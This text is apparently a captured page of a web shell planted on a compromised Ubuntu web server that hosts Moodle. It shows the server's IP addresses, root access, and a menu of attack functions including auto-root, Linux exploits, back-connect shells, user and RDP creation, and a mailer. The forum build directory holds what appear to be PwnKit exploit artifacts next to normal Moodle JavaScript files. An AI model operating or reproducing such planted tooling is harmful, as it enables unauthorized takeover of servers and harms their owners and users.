Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
mod /
forum /
amd /
build /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
grades
[ DIR ]
drwxrwxrwx
local
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
discussion.min.js
4.57
KB
-rwxrwxrwx
discussion.min.js.map
14.55
KB
-rwxrwxrwx
discussion_list.min.js
3.32
KB
-rwxrwxrwx
discussion_list.min.js.map
8.69
KB
-rwxrwxrwx
discussion_nested_v2.min.js
11.97
KB
-rwxrwxrwx
discussion_nested_v2.min.js.ma...
22.6
KB
-rwxrwxrwx
favourite_toggle.min.js
1.16
KB
-rwxrwxrwx
favourite_toggle.min.js.map
3.72
KB
-rwxrwxrwx
form-user-selector.min.js
1.11
KB
-rwxrwxrwx
form-user-selector.min.js.map
3.78
KB
-rwxrwxrwx
forum_events.min.js
407
B
-rwxrwxrwx
forum_events.min.js.map
1.24
KB
-rwxrwxrwx
inpage_reply.min.js
3.93
KB
-rwxrwxrwx
inpage_reply.min.js.map
12.41
KB
-rwxrwxrwx
lock_toggle.min.js
895
B
-rwxrwxrwx
lock_toggle.min.js.map
2.9
KB
-rwxrwxrwx
pin_toggle.min.js
1.35
KB
-rwxrwxrwx
pin_toggle.min.js.map
3.88
KB
-rwxrwxrwx
posts_list.min.js
2.15
KB
-rwxrwxrwx
posts_list.min.js.map
6.44
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
repository.min.js
2.35
KB
-rwxrwxrwx
repository.min.js.map
7.5
KB
-rwxrwxrwx
selectors.min.js
2.09
KB
-rwxrwxrwx
selectors.min.js.map
4.68
KB
-rwxrwxrwx
subscription_toggle.min.js
1.17
KB
-rwxrwxrwx
subscription_toggle.min.js.map
3.58
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : posts_list.min.js
/** * This module is the highest level module for the calendar. It is * responsible for initialising all of the components required for * the calendar to run. It also coordinates the interaction between * components by listening for and responding to different events * triggered within the calendar UI. * * @module mod_forum/posts_list * @package mod_forum * @copyright 2019 Peter Dias * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ define("mod_forum/posts_list",["jquery","core/templates","core/notification","core/pending","core/yui","mod_forum/selectors","mod_forum/inpage_reply"],(function($,Templates,Notification,Pending,Y,Selectors,InPageReply){return{init:function(root){!function(root){root.on("click",Selectors.post.inpageReplyLink,(function(e){if(e.preventDefault(),window.location.hash){var url=window.location.href.split("#")[0];history.pushState({},document.title,url)}var pending=new Pending("inpage-reply"),currentTarget=$(e.currentTarget).parents(Selectors.post.forumCoreContent),currentSubject=currentTarget.find(Selectors.post.forumSubject),currentRoot=$(e.currentTarget).parents(Selectors.post.forumContent),context={postid:$(currentRoot).data("post-id"),reply_url:$(e.currentTarget).attr("href"),sesskey:M.cfg.sesskey,parentsubject:currentSubject.data("replySubject"),canreplyprivately:$(e.currentTarget).data("can-reply-privately"),postformat:InPageReply.CONTENT_FORMATS.MOODLE};if(currentRoot.find(Selectors.post.inpageReplyContent).length){var form=currentRoot.find(Selectors.post.inpageReplyContent);form.slideToggle(300,pending.resolve),form.is(":visible")&&form.find("textarea").focus()}else Templates.render("mod_forum/inpage_reply",context).then((function(html,js){return Templates.appendNodeContents(currentTarget,html,js)})).then((function(){return currentRoot.find(Selectors.post.inpageReplyContent).slideToggle(300,pending.resolve).find("textarea").focus()})).then((function(){Y.use("moodle-core-formchangechecker",(function(){M.core_formchangechecker.init({formid:"inpage-reply-".concat(context.postid)})}))})).fail(Notification.exception)}))}(root),InPageReply.init(root)}}})); //# sourceMappingURL=posts_list.min.js.map
Close